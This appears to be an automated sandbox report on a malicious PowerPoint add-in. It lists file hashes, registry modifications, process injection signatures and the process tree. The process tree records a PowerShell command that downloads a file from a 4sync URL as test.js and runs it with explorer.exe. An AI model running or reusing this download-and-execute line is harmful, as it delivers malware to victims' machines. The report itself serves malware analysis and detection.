Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-03-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam
Resource
win10v2004-20240226-en
General
-
Target
c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam
-
Size
12KB
-
MD5
a1d2e92429553425cf7505c8563b84ed
-
SHA1
d5550fa4da1db73fb15f3fcdd8935504350c392b
-
SHA256
c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e
-
SHA512
9db3cce89055888cf4f7ef8db57dc171fa48f16a5d6724a540f16b365514672e6ec283b25cf6a3e7985c5dd57d5c7538263da690596eaa71dcac7cfeaf677f98
-
SSDEEP
192:xrXP/Rz9m/qgC0XvXUyhRT2QiDjhmdihVGBZGinvSo0Ctbc7PHET:dXPWqgvXmQiDVm8GBklWbc7PG
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process 1268 2180 powershell.exe POWERPNT.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
POWERPNT.EXEexplorer.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor POWERPNT.EXE Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell POWERPNT.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" POWERPNT.EXE -
Modifies registry class 64 IoCs
Processes:
POWERPNT.EXEexplorer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E551-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493479-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\ = "ThreeDFormat" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493497-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\ = "MediaBookmarks" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}\ = "Broadcast" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A75-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348D-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493484-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A76-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346A-5A91-11CF-8700-00AA0060263B}\ = "_Slide" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F8-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493462-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493480-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ChartGroup" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E553-4FF5-48F4-8215-5505F990966F}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E8-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\ = "PropertyEffect" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493453-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\ = "Designs" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2180 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1268 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
POWERPNT.EXEpid process 2180 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
POWERPNT.EXEpowershell.exedescription pid process target process PID 2180 wrote to memory of 2236 2180 POWERPNT.EXE splwow64.exe PID 2180 wrote to memory of 2236 2180 POWERPNT.EXE splwow64.exe PID 2180 wrote to memory of 2236 2180 POWERPNT.EXE splwow64.exe PID 2180 wrote to memory of 2236 2180 POWERPNT.EXE splwow64.exe PID 2180 wrote to memory of 1268 2180 POWERPNT.EXE powershell.exe PID 2180 wrote to memory of 1268 2180 POWERPNT.EXE powershell.exe PID 2180 wrote to memory of 1268 2180 POWERPNT.EXE powershell.exe PID 2180 wrote to memory of 1268 2180 POWERPNT.EXE powershell.exe PID 1268 wrote to memory of 1992 1268 powershell.exe explorer.exe PID 1268 wrote to memory of 1992 1268 powershell.exe explorer.exe PID 1268 wrote to memory of 1992 1268 powershell.exe explorer.exe PID 1268 wrote to memory of 1992 1268 powershell.exe explorer.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\c495ec8d688d14f6e90a75d6570ffbb3f34cd716e05f661a5c57acaf7cccc10e.ppam"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/Uu-eVHlE/Rka0iUpD.1b3c3483be5eabe21a44cc4fbefcdd0d -o test.js; explorer.exe test.js2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" test.js3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/872-19-0x0000000003A40000-0x0000000003A50000-memory.dmpFilesize
64KB
-
memory/872-25-0x0000000003A30000-0x0000000003A31000-memory.dmpFilesize
4KB
-
memory/872-20-0x0000000003A30000-0x0000000003A31000-memory.dmpFilesize
4KB
-
memory/1268-17-0x0000000002720000-0x0000000002760000-memory.dmpFilesize
256KB
-
memory/1268-18-0x000000006BD90000-0x000000006C33B000-memory.dmpFilesize
5.7MB
-
memory/1268-15-0x0000000002720000-0x0000000002760000-memory.dmpFilesize
256KB
-
memory/1268-14-0x000000006BD90000-0x000000006C33B000-memory.dmpFilesize
5.7MB
-
memory/1268-16-0x0000000002720000-0x0000000002760000-memory.dmpFilesize
256KB
-
memory/1268-13-0x000000006BD90000-0x000000006C33B000-memory.dmpFilesize
5.7MB
-
memory/2180-8-0x00000000043F0000-0x00000000044F0000-memory.dmpFilesize
1024KB
-
memory/2180-0-0x000000002D401000-0x000000002D402000-memory.dmpFilesize
4KB
-
memory/2180-2-0x0000000072DAD000-0x0000000072DB8000-memory.dmpFilesize
44KB
-
memory/2180-21-0x0000000072DAD000-0x0000000072DB8000-memory.dmpFilesize
44KB
-
memory/2180-22-0x00000000043F0000-0x00000000044F0000-memory.dmpFilesize
1024KB
-
memory/2180-23-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2180-24-0x0000000072DAD000-0x0000000072DB8000-memory.dmpFilesize
44KB
-
memory/2180-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB